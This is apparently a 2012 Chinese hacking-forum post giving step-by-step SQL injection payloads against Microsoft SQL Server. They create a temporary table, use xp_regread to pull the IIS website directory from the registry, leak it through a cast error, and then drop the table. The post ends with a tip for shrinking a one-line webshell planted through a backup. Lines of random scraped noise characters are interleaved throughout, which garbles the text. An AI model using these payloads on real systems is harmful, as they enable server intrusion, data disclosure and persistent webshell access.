1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 创建表
( T8 r, m8 l s. F/ G3 y8 X$ w- L8 n4 e0 {6 y; ^& E
3 p* Q, m. D) P3 { 2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’-- 将网站目录插到表字段中
V/ ^' K7 w# B* R" o7 X% u; N
) j0 `7 x4 [& b U0 ^6 f3 x' s: U( C
3、and (select top 1 cast([data] as nvarchar(4000) char(124) from [jm_tmp] order by [data] desc)=0 ’//暴出字段5 l$ @ K$ v" _' b
; {1 w& P& h. L& C) o1 Y5 a. X$ g; X: C+ ?
4、drop table [jm_tmp]-- 删除此表。; ]( ~% @# g' v @5 S) _4 x
* b ]' d7 A G( M+ i/ V
8 ]% U/ h" [/ C+ x" s- h( F; n
另附上备分专用一句话4 d' d+ a2 R0 u8 Y
加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.
y, r1 G K; W |
发表于 2012-9-15 14:23:52
收藏
支持
反对